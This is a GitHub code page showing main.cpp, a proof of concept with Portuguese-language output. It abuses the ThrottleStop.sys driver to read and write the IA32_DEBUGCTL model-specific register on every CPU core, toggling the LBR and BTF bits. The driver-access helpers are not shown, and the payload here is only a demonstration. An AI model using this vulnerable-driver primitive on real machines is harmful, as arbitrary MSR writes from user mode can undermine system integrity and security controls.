This repository was archived by the owner on Dec 25, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathmain.cpp
More file actions
93 lines (69 loc) · 2.32 KB
/
main.cpp
File metadata and controls
93 lines (69 loc) · 2.32 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#include "includes.h"
#define IA32_DEBUGCTL 0x1D9
void pause( )
{
printf( "\nPressione Enter para continuar" );
system( "pause>nul" );
printf( "\n" );
}
void toggle_lbr_btf_flags_on_core( uint32_t core_id )
{
printf( "\t[ + ] Setando Affinity Mask para o Core %d\n\n", core_id );
if ( !SetProcessAffinityMask( GetCurrentProcess( ), static_cast<uint64_t>( 1 ) << ( core_id - 1 ) ) )
return;
DebugCtl debug_ctl;
if ( exploit::read_msr( IA32_DEBUGCTL, &debug_ctl.value ) )
printf( "\t[ + ] LBR: %d | BTF: %d\n\t[ + ] Alternando Valores\n\n", debug_ctl.lbr, debug_ctl.btf );
else
{
printf( "\t[ ! ] Erro a ler o MSR\n" );
return;
}
debug_ctl.lbr = !debug_ctl.lbr;
debug_ctl.btf = !debug_ctl.btf;
if ( !exploit::write_msr( IA32_DEBUGCTL, debug_ctl.value ) )
{
printf( "\t[ ! ] Erro a escrever no MSR\n" );
return;
}
if ( exploit::read_msr( IA32_DEBUGCTL, &debug_ctl.value ) )
printf( "\t[ + ] LBR: %d | BTF: %d\n\t[ + ] Alternando Valores\n\n", debug_ctl.lbr, debug_ctl.btf );
else
printf( "\t[ ! ] Erro a ler o MSR\n" );
debug_ctl.lbr = !debug_ctl.lbr;
debug_ctl.btf = !debug_ctl.btf;
if ( !exploit::write_msr( IA32_DEBUGCTL, debug_ctl.value ) )
{
printf( "\t[ ! ] Erro a escrever no MSR\n" );
return;
}
if ( exploit::read_msr( IA32_DEBUGCTL, &debug_ctl.value ) )
printf( "\t[ + ] LBR: %d | BTF: %d\n", debug_ctl.lbr, debug_ctl.btf );
else
printf( "\t[ ! ] Erro a ler o MSR\n" );
}
int main( )
{
system( "title ThrottleStop PoC by M47Z" );
printf( "\n\tThrottleStop R/W MSR Exploit PoC by M47Z\n\nE necessario o driver (ThrottleStop.sys) estar a correr no computador antes do programa ser executado\n" );
pause( );
printf( "[ + ] Abrindo Handle\n" );
if ( !exploit::open_handle( ) )
{
printf( "[ ! ] Erro a Abrir Handle..." );
pause( );
return 1;
}
SYSTEM_INFO sys_info { };
GetSystemInfo( &sys_info );
printf( "[ + ] CPU com %d logical cores\n[ + ] Iterando core por core para alternar os bits LBR e BTF presentes no MSR IA32_DEBUGCTL\n\n", sys_info.dwNumberOfProcessors );
for ( uint32_t i = 1; i <= sys_info.dwNumberOfProcessors; i++ )
{
printf( "\nCore %d\n", i );
toggle_lbr_btf_flags_on_core( i );
}
printf( "\n[ + ] Fechando Handle\n" );
exploit::close_handle( );
pause( );
return 0;
}